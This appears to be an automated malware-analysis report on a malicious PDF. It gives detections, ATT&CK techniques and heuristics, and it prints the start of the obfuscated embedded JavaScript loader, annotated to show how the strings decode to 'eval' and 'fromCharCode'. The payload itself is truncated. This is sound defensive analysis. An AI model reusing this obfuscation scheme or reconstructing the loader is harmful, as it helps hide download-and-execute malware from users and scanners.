Verdict: MALICIOUS
Risk Score: 166
Malware Insights
MITRE ATT&CK
- T1059.007 JavaScript
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The PDF contains embedded JavaScript, flagged by multiple heuristics and a machine learning classifier. ClamAV detections indicate it's a known exploit targeting PDF viewers. The embedded JavaScript is heavily obfuscated but appears to be designed to download and execute a secondary payload, as suggested by the 'Pdf.Exploit.Agent-15666' and 'Win.Trojan.Agent-36166' detections.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9999
Heuristics (3)
- ClamAV: Pdf.Exploit.Agent-15666 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Exploit.Agent-15666
- JavaScript action (low, 1 related finding, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Hash | Kind | Source | Size | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| javascript_obj0007_000.js | 6806fc957d8ad76089e221b8b27f182cffb1aa3b6e69ac1dfdc7943b17b6ae13 | pdf-javascript-stream | PDF /JS object 7 at offset 0x1A5 | 74767 bytes | ClamAV: Win.Trojan.Agent-36166 | unlikely |
Preview script (first 1,000 lines of the extracted script; the comments noting what each obfuscated string decodes to were added in editing and are not part of the sample):

```javascript
var zamavajedo = String;
// 'fUYQrUXoJYmYUCUUhYaUrZUCYZYoQXQdYXeQ' with the characters [XZYUQJ] stripped reads 'fromCharCode'
gesalutew = zamavajedo['fUYQrUXoJYmYUCUUhYaUrZUCYZYoQXQdYXeQ'.replace(/[XZYUQJ]/g,'')];
// 'eXXvUXUaZQlJJJ' with the characters [XZYUQJ] stripped reads 'eval'
cipuqoj = zamavajedo['eXXvUXUaZQlJJJ'.replace(/[XZYUQJ]/g,'')];
// Maps one whitespace-separated token of the encoded string to a single hex digit:
// the literals '0'..'6' map to fixed digits, any other token maps to its length in hex.
function o(w) {
  if (w=='0') return '0';
  else if (w=='1') return 'f';
  else if (w=='2') return 'e';
  else if (w=='3') return 'd';
  else if (w=='4') return 'c';
  else if (w=='5') return 'b';
  else if (w=='6') return 'a';
  else return w.length.toString(16)
};
// The encoded payload string `s` (several lines of letter-run tokens) and the rest of the
// script follow here; the report truncates the preview.
```

... (truncated)